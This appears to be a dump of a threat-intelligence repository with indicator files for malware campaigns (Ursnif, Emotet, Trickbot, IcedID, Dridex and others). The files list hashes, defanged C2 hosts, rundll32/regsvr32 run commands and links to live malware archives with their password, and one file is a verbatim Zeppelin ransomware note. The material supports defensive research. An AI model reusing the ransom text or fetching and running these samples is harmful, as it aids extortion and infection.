hash: 34c9a837ae0797151f8d3f6472ec03a1c309e773a35a0a4d6cf912dc952c4ad5 24 | - File size: 245,490 bytes 25 | - File name: myResume_345.xlsb 26 | - File description: Excel spreadsheet with macro for Ursnif (Gozi/ISFB) 27 | 28 | - SHA256 hash: ebdcae44c2a97e9b43045e79ebffc4b0db3fb92387a99e4432be3c03d51664a1 29 | - File size: 317,448 bytes 30 | - File location: hxxp://205.185.113[.]20/files/1.dll 31 | - File location: C:\yXPLXnD\YMVsnRT\LlwqJGc.dll 32 | - File description: DLL file for Ursnif (Gozi/ISFB) 33 | - Run method: rundll32.exe [filename],DllRegisterServer 34 | 35 | - SHA256 hash: b2cc1c54c3bbde2a7c0c0a32396bc6dba4d327d7a83278f478dce2f59d6751ef 36 | - File size: 700,416 bytes 37 | - File location: hxxp://162.0.224[.]165/server.rar [sent as encoded data, decrypted on victim host] 38 | - File location: C:\Users\[username]\AppData\Local\Temp\18531984.exe 39 | - File description: Delf malware variant 40 | 41 | INFECTION TRAFFIC: 42 | 43 | - 205.185.113[.]20 port 80 - 205.185.113[.]20 - GET /SYrgg8Ts 44 | - 205.185.113[.]20 port 80 - 205.185.113[.]20 - GET /files/1.dll 45 | - 37.120.222[.]107 port 80 - booloolo2[.]com - GET /images/[long base64 string with underscores and slashes].avi 46 | - 162.0.224[.]165 port 80 - 162.0.224[.]165 - GET /grab32.rar 47 | - 162.0.224[.]165 port 80 - 162.0.224[.]165 - GET /grab64.rar 48 | - 193.239.84[.]250 port 443 - HTTPS traffic 49 | - 162.0.224[.]165 port 80 - 162.0.224[.]165 - GET /server.rar 50 | - 79.110.52[.]28 port 15497 - TCP traffic caused by Delf variant 51 | -------------------------------------------------------------------------------- /2020-12-10-Ursnif-infection-with-Delf-variant.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2020-12-10-Ursnif-infection-with-Delf-variant.pcap.zip -------------------------------------------------------------------------------- /2020-12-11-Zepplin-ransomware-note.txt: -------------------------------------------------------------------------------- 1 | !!! ALL YOUR FILES ARE ENCRYPTED !!! 2 | 3 | All your files, documents, photos, databases and other important files are encrypted. 4 | 5 | You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. 6 | Only we can give you this key and only we can recover your files. 7 | 8 | To be sure we have the decryptor and it works you can send an email: yongloun@tutanota.com and decrypt one file for free. 9 | But this file should be of not valuable! 10 | 11 | Do you really want to restore your files? 12 | Write to email: wiruxa@airmail.cc 13 | Reserved email: anygrishevich@yandex.ru 14 | 15 | Your personal ID: 184-75F-AD3 16 | 17 | Attention! 18 | * Do not rename encrypted files. 19 | * Do not try to decrypt your data using third party software, it may cause permanent data loss. 20 | * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 21 | -------------------------------------------------------------------------------- /2021-01-05-Emotet-and-Trickbot-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-01-05 (TUESDAY) - EMOTET EPOCH 2 INFECTION WITH TRICKBOT GTAG MOR10 2 | 3 | INFORMATION FROM EMAIL DISTRIBUTING EMOTET: 4 | 5 | - Received: from new.dtco-qatar[.]com (unknown [66.84.9[.]24]) 6 | - Date: Tue, 05 Jan 2021 12:08:03 -0300 7 | - From: "[spoofed sender name]" 8 | - To: "[recipient's name]" <[recipient's email address]> 9 | - Subject: Weekly data roundup 10 | - Attachment file name: Form.doc 11 | 12 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 13 | 14 | WORD MACRO RETRIEVING EMOTET DLL: 15 | 16 | - 173.254.250[.]226 port 443 (HTTPS) - fathekarim[.]com - GET /images/jiC/ 17 | 18 | EMOTET POST-INFECTION TRAFFIC: 19 | 20 | - 90.160.138[.]175 port 80 - 90.160.138[.]175 - POST /[string of alpha-numeric characters with or without backslashes] 21 | - 167.99.105[.]11 port 8080 - 167.99.105[.]11:8080 - POST /[string of alpha-numeric characters with or without backslashes] 22 | - NOTE: Saw several HTTP POST requests to the above IP addresses. 23 | 24 | TRICKBOT POST-INFECTION TRAFFIC: 25 | 26 | - port 443 - api.ipify[.]org - HTTPS traffic (IP address check, not inherently malicious) 27 | - 102.164.208[.]44 port 449 - HTTPS traffic 28 | - 103.220.47[.]220 port 447 - HTTPS traffic 29 | - 110.39.160[.]66 port 447 - HTTPS traffic 30 | - 186.47.209[.]222 port 443 - 186.47.209[.]222:443 - POST /mor10/[ASCII string that includes host info]/83/ 31 | - 186.47.209[.]222 port 443 - 186.47.209[.]222:443 - POST /mor10/[ASCII string that includes host info]/81/ 32 | - 186.47.209[.]222 port 443 - 186.47.209[.]222:443 - POST /mor10/[ASCII string that includes host info]/90 33 | 34 | URLS USED BY TRICKBOT'S PROPAGATION MODULES TO RETRIEVE ADDITIONAL TRICKBOT EXE FILES: 35 | 36 | - 192.119.162[.]87 port 80 - 192.119.162[.]87 - GET /images/saved.png 37 | - 192.119.162[.]87 port 80 - 192.119.162[.]87 - GET /images/mingup.png 38 | 39 | MALWARE FROM THIS INFECTION: 40 | 41 | - SHA256 hash: fa67e7f709be28273b80782e6576f2e93ec9a1018626c3907d55e005fe12cf0d 42 | - File size: 176,027 bytes 43 | - File name: Form.doc 44 | - File description: Email attachment, Word doc with macros for Emotet epoch 2 45 | 46 | - SHA256 hash: bf56974a6feb0bb55e1a0064c4a9124f29e0fe5bca6b10fd5b7fa287b712eadb 47 | - File size: 195,072 bytes 48 | - File location: hxxps://fathekarim[.]com/images/jiC/ 49 | - File location: C:\Users\[username]\ 50 | - File location: C:\Users\[username]\AppData\Local\Ckninfwzsiyqxydc\ialkquzoobkioba.czi 51 | - File description: Windows DLL for Emotet epoch 2 retreived by macro from above Word doc 52 | - Run method: rundll32.exe [filename],Control_RunDLL 53 | 54 | - SHA256 hash: f57ec5263ab7f3191cfd364dd364e694f93769b691514d3a2e39e6812471e80e 55 | - File size: 602,112 bytes 56 | - File location: C:\Users\[username]\AppData\Local\Ckninfwzsiyqxydc\kripbnjh.exe 57 | - File location: C:\Users\[username]\AppData\newyearTV5382453440\ kripbnjh.exe 58 | - File description: Windows EXE for Trickbot gtag mor10 59 | 60 | - SHA256 hash: 59e1711d6e4323da2dc22cdee30ba8876def991f6e476f29a0d3f983368ab461 61 | - File size: 434,304 bytes 62 | - File location: hxxp://192.119.162[.]87/images/mingup.png 63 | - File description: Windows EXE retrieved by Trickbot-infected host for Trickbot gtag lib5 64 | 65 | - SHA256 hash: ed8dea5381a7f6c78108a04344dc73d5669690b7ecfe6e44b2c61687a2306785 66 | - File size: 442,496 bytes 67 | - File location: hxxp://192.119.162[.]87/images/saved.png 68 | - File description: Windows EXE retrieved by Trickbot-infected host for Trickbot gtag tot5 -------------------------------------------------------------------------------- /2021-01-06-SystemBC-domain-list.txt: -------------------------------------------------------------------------------- 1 | 26asdcgd[.]com 2 | adsblog179[.]xyz 3 | xadsblog279[.]xyz 4 | fgksdstat14tp[.]xyz 5 | gmstar23[.]xyz 6 | fgkmailserv19fd[.]xyz 7 | psxadvexmail19mn[.]xyz 8 | mxblogs19[.]xyz 9 | adxspace147[.]xyz 10 | rzazmrserv194[.]xyz 11 | pzlkxadvert475[.]xyz 12 | scgsdstat14tp[.]xyz 13 | gmstar23[.]xyz 14 | dec15coma[.]com 15 | dump17alertos[.]com 16 | knzmtxserv437[.]xyz 17 | servx278x[.]xyz 18 | admex175x[.]xyz 19 | dec15coma[.]xyz 20 | pqrmailadvert15dx[.]xyz 21 | swxmailserv19fd[.]xyz 22 | blogspex25[.]xyz 23 | advert127ds[.]xyz 24 | -------------------------------------------------------------------------------- /2021-01-08-IOCs-from-Ave-Maria-RAT.txt: -------------------------------------------------------------------------------- 1 | 2021-01-08 (FRIDAY) - EXAMPLE OF AVE MARIA RAT FROM MALICIOUS SPAM 2 | 3 | NOTE: 4 | 5 | - For more information about Remote Access Tool (RAT) malware called Ave Maria, see: 6 | https://team-cymru.com/blog/2019/07/25/unmasking-ave_maria/ 7 | 8 | EMAIL HEADERS: 9 | 10 | Received: from [45.15.143.212] (port=62972 helo=mediplusmedikal.com) 11 | by [information removed] (envelope-from ) 12 | id 1kxcBL-002VfA-PI for [information removed]; Thu, 07 Jan 2021 13:47:02 -0700 13 | From: Tonia Kins 14 | Subject: RE: Re:Fw: Telex Release #06012020.xls 15 | Date: 07 Jan 2021 21:46:41 +0100 16 | Message-ID: <20210107214641.DDA47117FE9E2265@mediplusmedikal.com> 17 | 18 | ASSOCIATED MALWARE: 19 | 20 | - SHA256 hash: 07a877cc1499b20ae7bcaf0200f2576a100754fa661e391f36cbb95aa58a75b9 21 | - File size: 122,880 bytes 22 | - File name: Telex#06012020.xls 23 | - File description: Email attachment, an Excel spreadsheet with macro for Ave Maria RAT 24 | 25 | - SHA256 hash: 0d036e60f241fa89c4662fdaad193a5a7a372677a436b0e91cec8e96d4b7c7a6 26 | - File size: 453,227 bytes 27 | - File location: hxxp://lankarecipes[.]com/mages.jpg 28 | - File description: Text file for Powershell script retreived by Excel macro 29 | 30 | - SHA256 hash: 504e0489472d6107d56d6d4f88600200b055bd97c3158ef1c9a54ea38074351a 31 | - File size: 339,293 bytes 32 | - File location: C:\Users\[username]\AppData\Local\Temp\Test3.jpg 33 | - File description: Windows EXE for Ave Maria RAT 34 | 35 | TRAFFIC TO RETRIEVE POWERSHELL SCRIPT: 36 | 37 | - 192.185.236[.]165 port 80 - lankarecipes[.]com - GET /mages.jpg 38 | 39 | POST-INFECTION C2 TRAFFIC: 40 | 41 | - 37.46.150[.]86 port 5200 - encoded or encrypted TCP traffic (not HTTPS/SSL/TLS) -------------------------------------------------------------------------------- /2021-01-11-IOCs-for-Dridex-traffic-with-webshell.txt: -------------------------------------------------------------------------------- 1 | 2021-01-11 (MONDAY) - DRIDEX INFECTION WITH WEBSHELL TRAFFIC 2 | 3 | REFERENCES: 4 | 5 | - https://twitter.com/JAMESWT_MHT/status/1348655938216087553 6 | - https://twitter.com/58_158_177_102/status/1348649830344581122 7 | - https://twitter.com/reecdeep/status/1348649270174478336 8 | 9 | HEADERS FROM EXAMPLE OF EMAIL DISTRIBUTING DRIDEX 10 | 11 | Received: from exchange.millepiedi.net (unknown [93.145.111.74]) 12 | by [recipient's email server] (Postfix) with ESMTP id 908DB500802 13 | for <[recipient's email address]>; Mon, 11 Jan 2021 16:25:08 +0100 (CET) 14 | Received: from [90.110.38.175] (account 15 | silveringe19@CHR1PR1EX72.chrobinson.com HELO 16 | pnmmtcyqojjwaq.lrbgmdgxrtay.host) 17 | by exchange.millepiedi.net (Postfix) 18 | with ESMTPA id 42163DbB for [recipient's email address]; 19 | Mon, 11 Jan 2021 16:25:07 +0100 20 | Received: from [192.141.1.76] (account silveringe19@CHR1PR1EX72.chrobinson.com 21 | HELO mrfnciscl.cyrugjzysixn.biz) by exchange.millepiedi.net (Postfix) 22 | with esmtpa id 221eCDdA for [recipient's email address]; 23 | Mon, 11 Jan 2021 16:25:07 +0100 24 | Date: Mon, 11 Jan 2021 16:25:07 +0100 25 | Message-ID: 26 | From: 27 | To: [recipient's email address] 28 | Subject: Freightquote Invoice 29 | Attachment name: INV3856501643-20210111381234.xlsm 30 | 31 | ASSOCIATED MALWARE: 32 | 33 | - SHA256 hash: a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0 34 | - File size: 42,039 byte 35 | - File name: INV9261221402-20210111302151.xlsm 36 | - File description: Email attachment, an Excel file with macro for Dridex 37 | 38 | - SHA256 hash: 3997bf3cf7485ae768f7a23aaa9004f73b0594550611138906821f9b4dc9bce7 39 | - File size: 318,976 bytes 40 | - File location: hxxp://www.sustaino2[.]com/q0ig4v.rar 41 | - File location: C:\Users\[username]\AppData\Local\Temp\uyqpshep.dll 42 | - File description: Excample of DLL called by Excel macro to install Dridex 43 | - Run method: regsvr32.exe -s [filename]. 44 | 45 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 46 | 47 | - 43.255.154[.]9 port 80 - www.sustaino2[.]com - GET /q0ig4v.rar (Dridex DLL) 48 | - 77.220.64[.]37 port 443 - HTTPS C2 traffic causeed by Dridex 49 | - 23.95.132[.]44 port 443 - HTTPS C2 traffic causeed by Dridex 50 | - 151.80.241[.]109 port 443 - 151.80.241[.]109:2953 - GET / (webshell traffic) 51 | 52 | NOTE: An example of the webshell can be downloaded from: https://app.any.run/tasks/00c67973-c98b-49d0-bf33-c1f4da3d4078 -------------------------------------------------------------------------------- /2021-02-08-tech-zupport-scam-audio.mp3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-02-08-tech-zupport-scam-audio.mp3 -------------------------------------------------------------------------------- /2021-03-08-IOCs-from-Banload-infection.txt: -------------------------------------------------------------------------------- 1 | 2021-03-08 (MONDAY) - BANLOAD MALWARE FROM NFS-e THEMED MALSPAM 2 | 3 | EMAIL HEADERS: 4 | 5 | Received: from contato06.notascentral[.]com ([13.75.169[.]12]) by [removed] for [removed]; 6 | Mon, 08 Mar 2021 14:47:29 +0000 (UTC) 7 | Received: from [127.0.0.1] (contato06 [127.0.0.1]) 8 | by contato06.notascentral[.]com (Postfix) with ESMTP id C8FFA425DA 9 | for [recipient's email address]; Mon, 8 Mar 2021 14:44:57 +0000 (UTC) 10 | Content-Type: multipart/alternative; 11 | boundary="===============4604171671619042800==" 12 | Subject: Nota Fiscal de Servicos Eletronica - NFS-e No. 202125368583 emitida 13 | From: Prefeitura Do Recife 14 | To: [recipient's email address] 15 | Date: Mon, 8 Mar 2021 14:44:57 +0000 (UTC) 16 | 17 | LINK FROM THE EMAIL: 18 | 19 | - hxxps://arquivomes03.brazilsouth.cloudapp.azure[.]com/?usuario=[recipient's email address] 20 | 21 | MALICIOUS FILES: 22 | 23 | - SHA256 hash: 500015fe83d96b841d401a5d48287d3a164ec90d0810498af4d3b9ac73b67cda 24 | - File size: 130,522 bytes 25 | - File name: Arquivo-dig ZBVS WDNCNR HNUBHBAM BJRPHYLTYZ .zip 26 | - File description: ZIP archive containing Banload malware installer, downloaded from link in the email. 27 | - NOTE: This is a different name and file hash each download 28 | 29 | - SHA256 hash: f364525bd719aefacb0453cb9eb8814d8c67b87ce0928aed13196936115f9280 30 | - File size: 274,432 bytes 31 | - File name: digital.-.online C∩RWROI┐A∩┐┐┐┐M╜∩╜┐╜X╜╜A╜S┐OYW╜┐N∩YMA┐T∩╜Z∩A∩╜CHZA.msi 32 | - File description: Installer for Banload malware 33 | 34 | - SHA256 hash: 53f76e3e31e07b39ec05c845666339930f7b8e37b9c07ed62dab10b2a30323d3 35 | - File size: 4,410,880 bytes 36 | - File name: C:\[various directory paths]\imgengine.dll 37 | - File description: Banload malware DLL named "imgengine.dll" and loaded by legitimate file DiscSoftBusServicePro.exe 38 | 39 | NON-MALICIOUS FILES ASSOCIATED WITH THIS INFECTION: 40 | 41 | - SHA256 hash: ee38171c75dbb5c3cde877ec28d8cca9eec2ca3277eea9250e03bd90b1125d6f 42 | - File size: 1,970,368 bytes 43 | - File name: C:\[various directory paths\[random name].exe 44 | - File description: Copy DiscSoftBusServicePro.exe, a legitimate EXE that's part of DAEMON Tools Pro software 45 | - NOTE: This file is used to load any DLL named imgengine.dll. 46 | 47 | - SHA256 hash: 1c7d5e42ff3bc5e1a0ecd01fa68633dc67515b3a06e660fcd2d22d6ea436a6f1 48 | - File size: 51,232 bytes 49 | - File name: C:\[various directory paths]\sptdintf.dll 50 | - File description: A legitimate DLL file also loaded by DiscSoftBusServicePro.exe 51 | 52 | TRAFFIC FROM AN INFECTION: 53 | 54 | - hxxps://arquivomes03.brazilsouth.cloudapp.azure[.]com/?usuario=[recipient's email address] 55 | - hxxps://arquivomes03.brazilsouth.cloudapp.azure[.]com/index_1/ 56 | - hxxps://casaprodutosportal[.]net/hintro/hilos.gif 57 | - hxxps://shonitrohifi[.]com/hiroshi/rihappy.php 58 | - hxxps://docs.google[.]com/document/d/1D_TTlVEZzJILrMcnt5CP_WNlo5yXWZVbFDYwXT24NHI/edit 59 | - hxxps://hirotrindade.webcindario[.]com/soremb/especial -------------------------------------------------------------------------------- /2021-03-15-IcedID-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-03-15 (MONDAY) ICEDID (BOKBOT) FROM EXCEL SPREADSHEET MACROS 2 | 3 | EMAIL, TRAFFIC, AND MALWARE SAMPLES AVAILABLE AT: 4 | 5 | - https://github.com/pan-unit42/tweets/blob/master/2021-03-15-malspam-pushing-IcedID.eml.zip 6 | - https://github.com/pan-unit42/tweets/blob/master/2021-03-15-IcedID-infection-traffic.pcap.zip 7 | - https://github.com/pan-unit42/tweets/blob/master/2021-03-15-IcedID-malware-and-artifacts.zip 8 | 9 | NOTE: Password for any of the above zip archives is: infected 10 | 11 | INFECTION CHAIN: 12 | 13 | - malicious spam --> ZIP attachment --> extract Excel file --> enable macros --> Installer DLL --> gziploader process --> IcedID 14 | 15 | REFERENCE: 16 | 17 | - https://www.binarydefense.com/icedid-gziploader-analysis/ 18 | 19 | ASSOCIATED MALWARE: 20 | 21 | - SHA256 hash: 0b31911de524410fef3725f6fe5b565c6cb3e3b2ea5b7267bebc097f9fb57eb3 22 | - File size: 156,675 bytes 23 | - File name: CompensationClaim_605614143_03152021.zip 24 | - File description: ZIP archive attached to malicious spam pushing IcedID 25 | 26 | - SHA256 hash: 1852801558498c3bbc67b028b592ba9444a4e687a7f67737a393ce3f756d8c87 27 | - File size: 239,104 bytes 28 | - File name: CompensationClaim_605614143_03152021.xls 29 | - File description: Extracted from the above ZIP archive, an Excel file with macro for IcedID 30 | 31 | - SHA256 hash: f175d5883a0958f8ce10c387fef6c6750d26089e7413bf7b9a3767b655e61417 32 | - File size: 44,544 bytes 33 | - File location: hxxp://188.127.254[.]114/44270.7145450231.dat 34 | - File location: hxxp://185.82.219[.]160/44270.7145450231.dat 35 | - File location: hxxp://45.140.146[.]34/44270.7145450231.dat 36 | - File location: C:\Users\[username]\SOT.GOT 37 | - File location: C:\Users\[username]\SOT.GOT1 38 | - File location: C:\Users\[username]\SOT.GOT2 39 | - File description: Installer DLL for IcedID 40 | - Run method: rundll32.exe [filename],DllRegisterServer 41 | 42 | - SHA256 hash: 54d7277a2637bd8b410419f06a189b902243e91eb683435b931ae013d5a576f0 43 | - File size: 36,352 bytes 44 | - File location: C:\Users\[username]\AppData\Local\Temp\raise_x64.tmp 45 | - File description: Initial IcedID DLL 46 | - Run method: rundll32.exe [filename],update /i:[filepath]\license.dat 47 | 48 | - SHA256 hash: 7b329e340343bcdf1a70d1b487093bb3a4579f603a97214ecdcf78b339a6a1fc 49 | - File size: 36,352 bytes 50 | - File location: C:\Users\[username]\AppData\Roaming\{00F0279B-1BB6-6935-485C-566FF0BA28FC}\[username]\ruoyan.dll 51 | - File description: Persistent IcedID DLL 52 | - Run method: rundll32.exe [filename],update /i:[filepath]\license.dat 53 | 54 | - SHA256 hash: 45b6349ee9d53278f350b59d4a2a28890bbe9f9de6565453db4c085bb5875865 55 | - File size: 341,002 bytes 56 | - File location: C:\Users\[username]\AppData\Roaming\SpringGoat\license.dat 57 | - File description: Data file used by the above two IcedID DLL files 58 | 59 | TRAFFIC TO RETRIEVE INSTALLER DLL FOR ICEDID: 60 | 61 | - 188.127.254[.]114 port 80 - 188.127.254[.]114 - GET /44270.7145450231.dat 62 | - 185.82.219[.]160 port 80 - 185.82.219[.]160 - GET /44270.7145450231.dat 63 | - 45.140.146[.]34 port 80 - 45.140.146[.]34 - GET /44270.7145450231.dat 64 | 65 | TRAFFIC GENERATED BY INSTALLER DLL: 66 | 67 | - port 443 - aws.amazon.com - HTTPS traffic 68 | - 178.128.243[.]14 port 80 - apoxiolazio55[.]space GET / 69 | 70 | ICEDID C2 TRAFFIC: 71 | 72 | - 165.227.28[.]47 port 443 - twotoiletsr[.]space - HTTPS traffic 73 | - 165.227.28[.]47 port 443 - iporumuski[.]fun - HTTPS traffic -------------------------------------------------------------------------------- /2021-03-15-IcedID-infection-traffic.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-15-IcedID-infection-traffic.pcap.zip -------------------------------------------------------------------------------- /2021-03-15-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-15-IcedID-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-03-15-malspam-pushing-IcedID.eml.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-15-malspam-pushing-IcedID.eml.zip -------------------------------------------------------------------------------- /2021-03-22-Dridex-malspam-10-examples.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-22-Dridex-malspam-10-examples.zip -------------------------------------------------------------------------------- /2021-03-22-Dridex-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-22-Dridex-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-03-24-IOCs-for-IcedID-infection-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2021-03-24 (WEDNESDAY) - ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - A zip archive containing the associated malware and artifacts is available at: 6 | 7 | -- https://github.com/pan-unit42/tweets/blob/master/2021-03-24-IcedID-malware-and-artifacts.zip 8 | 9 | - This infection took place in an Active Directory (AD) environment, and we saw traffic associated with Cobalt Stike activity after the initial IcecdID infection. 10 | 11 | - We often see follow-up activity like Cobalt Strike from IcedID and other malware families when testing in an AD environment. But when testing the same malware on stand-alone Windows hosts, we do not find Cobalt Strike. 12 | 13 | CHAIN OF EVENTS: 14 | 15 | - Email --> attached ZIP archive --> extracted Excel spreadsheet --> Enable macros --> installer DLL --> gzip compressed binary --> IcedID (Bokbot) 16 | 17 | MALWARE FROM AN INFECTION: 18 | 19 | - SHA256 hash: 03494593165c2e14643f692edf60ee67ba5983d814eea12d8ea7319eb1a28100 20 | - File size: 208,386 bytes 21 | - File name: Documents (478).xlsm 22 | - File description: Example of Excel spreadsheet with macro for IcedID (Bokbot) 23 | 24 | - SHA256 hash: 39022f8c0188179ac2459fb3757db51f61cd9657568ee79001c6f9501d85e84e 25 | - File size: 67,416 bytes 26 | - File location: hxxp://ovesf23knfg03eixqds[.]xyz/gf.gif 27 | - File location: C:\Users\Public\connectfront.xref 28 | - File description: Installer DLL for IcedID (Bokbot) 29 | - Run method: regsvr32 -s C:\Users\Public\connectfront.xref 30 | 31 | - SHA256 hash: f90ddca891da06aece3acf7e63070b4cb7d2c5acc0e52ad73b23ae795befd237 32 | - File size: 386,379 bytes 33 | - File location: hxxp://24savetonnofmaoney[.]xyz/ 34 | - File description: Binary with gzip compressed data used to create license.dat and IcedID DLL files 35 | 36 | - SHA256 hash: 29d2a8344bd725d7a8b43cc77a82b3db57a5226ce792ac4b37e7f73ec468510e 37 | - File size: 341,098 bytes 38 | - File location: C:\Users\[username]\AppData\Roaming\LuxuryQuarter\license.dat 39 | - File description: data binary needed to run the IcedID DLL files 40 | 41 | - SHA256 hash: 6c2846b4ea908abb46663d6044a50012d42eed123bf47fe045f59f076104c92c 42 | - File size: 45,056 bytes 43 | - File location: C:\Users\[username]\AppData\Local\Temp\item_64.dat 44 | - File description: initial IcedID DLL 45 | - Run method: rundll32.exe [filename],update /i:"AreaArrest\license.dat" 46 | 47 | - SHA256 hash: 5fe4d17b25fd66a417eb4f4fe1c9214f9410bb66937ad877295c938f318c2744 48 | - File size: 45,056 bytes 49 | - File location: C:\Users\[username]\AppData\Roaming\[username]\{9382BE5D-ADC1-386D-2E12-25BAA43199E2}\aruqsefu.dll 50 | - File description: persistent IcedID DLL 51 | - Run method: rundll32.exe [filename],update /i:"AreaArrest\license.dat" 52 | 53 | TRAFFIC FROM AN INFECTION: 54 | 55 | TRAFFIC TO RETRIEVE INSTALLER DLL: 56 | 57 | - 8.209.98[.]100 port 80 - ovesf23knfg03eixqds[.]xyz - GET /gf.gif 58 | 59 | TRAFFIC GENERATED BY RUNNING INSTALLER DLL: 60 | 61 | - port 443 (HTTPS) - aws.amazon[.]com - GET / (connectivity check, not malicious) 62 | - 164.90.163[.]184 port 80 - 24savetonnofmaoney[.]xyz - GET / 63 | 64 | ICEDID (BOKBOT) C2 TRAFFIC: 65 | 66 | - 138.68.10[.]5 port 443 - shaxtugel[.]fun 67 | - 138.68.10[.]5 port 443 - kosmolitopor[.]space 68 | 69 | COBALT STRIKE TRAFFIC: 70 | 71 | - 66.70.246[.]6 port 443 - HTTPS traffic 72 | - 66.70.246[.]6 port 443 - securityinstant[.]org - HTTPS traffic 73 | -------------------------------------------------------------------------------- /2021-03-24-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-03-24-IcedID-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-04-12-IcedID-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-04-12 (MONDAY) - ICEDID (BOKBOT) FROM ZIPPED JS FILE: 2 | 3 | NOTES: 4 | 5 | - A zip archive containing the associated malware and artifacts is available at: 6 | 7 | -- https://github.com/pan-unit42/tweets/blob/master/2021-04-12-IcedID-malware-and-artifacts.zip 8 | 9 | - Reference: https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/ 10 | 11 | - Based on the above report, we found a zip archive from today (Monday 2021-04-12) containing a malicious .js file associated with this campaign. 12 | 13 | MALWARE: 14 | 15 | - SHA256 hash: d4993d4433e5f847362591e3148009a071244e464c7b265affb6e6e07985610c 16 | - File size: 8,119 bytes 17 | - File name: StolenImages_Evidence.zip 18 | - File description: ZIP archive retrieved from link in email pushing IcedID 19 | 20 | - SHA256 hash: 0314b8cd45b636f38d07032dc8ed463295710460ea7a4e214c1de7b0e817aab6 21 | - File size: 28,195 bytes 22 | - File name: StolenImages_Evidence.js 23 | - File description: JS file extracted from the above ZIP archive 24 | 25 | - SHA256 hash: 213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c 26 | - File size: 214,542 bytes 27 | - File location: hxxp://banusdona[.]top/222g100/main.php 28 | - File location: C:\Users\[username]\AppData\Local\Temp\JwWdx.dat 29 | - File description: Installer DLL for IcedID 30 | - Run method: rundll32.exe [filename],DllRegisterServer 31 | 32 | - SHA256 hash: 3d1b525ec2ee887bbc387654f6ff6d88e41540b789ea124ce51fb5565e2b8830 33 | - File size: 507,723 bytes 34 | - File location: hxxp://momenturede[.]fun/ 35 | - File description: Fake gzip file called by installer DLL used to create IcedID DLL and license.dat files 36 | 37 | - SHA256 hash: 29d2a8344bd725d7a8b43cc77a82b3db57a5226ce792ac4b37e7f73ec468510e 38 | - File size: 341,098 bytes 39 | - File location: C:\Users\[username]\AppData\Roaming\GlancePlay\license.dat 40 | - File description: binary data file used to run IcedID DLL files 41 | 42 | - SHA256 hash: a0f92bc42ff69b63a34614f4795c40a2ca3884493949025b48d633dc2efa8ab6 43 | - File size: 166,400 bytes 44 | - File location: C:\Users\[username]\AppData\Local\Temp\originalx32.dat 45 | - File description: Initial DLL for IcedID infection 46 | - Run method: rundll32.exe [filename],update /i:"GlancePlay\license.dat" 47 | 48 | - SHA256 hash: e989aa952f71816e08a8587ba20f37f5d6f4c5196d368b6229183ac9542e2c85 49 | - File size: 166,400 bytes 50 | - File location: C:\Users\[username]\AppData\Roaming\[username]\Haimaw2.dll 51 | - File description: Persistent DLL for IcedID infection 52 | - Run method: rundll32.exe [filename],update /i:"GlancePlay\license.dat" 53 | 54 | TRAFFIC GENERATED BY .JS FILE TO RETRIEVE INSTALLER DLL: 55 | 56 | - 172.67.188[.]12 port 80 - banusdona[.]top - GET /222g100/index.php 57 | - 172.67.188[.]12 port 80 - banusdona[.]top - GET /222g100/main.php 58 | 59 | TRAFFIC GENERATED BY INSTALLER DLL TO RETRIVE FAKE GZIP FILE USED TO CREATE ICEDID FILES: 60 | 61 | - port 443 - aws.amazon.com - HTTPS traffic 62 | - 104.236.115[.]181 port 80 - momenturede[.]fun - GET / 63 | 64 | C2 TRAFFIC GENERATED BY ICEDID: 65 | 66 | - 83.97.20[.]176 port 443 - odichaly[.]space - HTTPS traffic 67 | - 83.97.20[.]176 port 443 - ameripermanentno[.]website - HTTPS traffic 68 | - 83.97.20[.]176 port 443 - mazzappa[.]fun - HTTPS traffic 69 | - 83.97.20[.]176 port 443 - vaccnavalcod[.]website - HTTPS traffic 70 | 71 | OTHER ICEDID C2 DOMAINS ON 83.97.20.176: 72 | 73 | - daserwewlollipop[.]club 74 | - chajkovsky[.]space 75 | - ohbluebennihill[.]website 76 | - seconwowa[.]cyou 77 | - violonchelistto[.]space -------------------------------------------------------------------------------- /2021-04-12-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-04-12-IcedID-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-04-15-IOCs-for-AsyncRAT-activity.txt: -------------------------------------------------------------------------------- 1 | 2021-04-15 (THURSDAY) - ASYNC RAT FROM MALICIOUS EMAIL 2 | 3 | HEADERS FROM EMAIL: 4 | 5 | 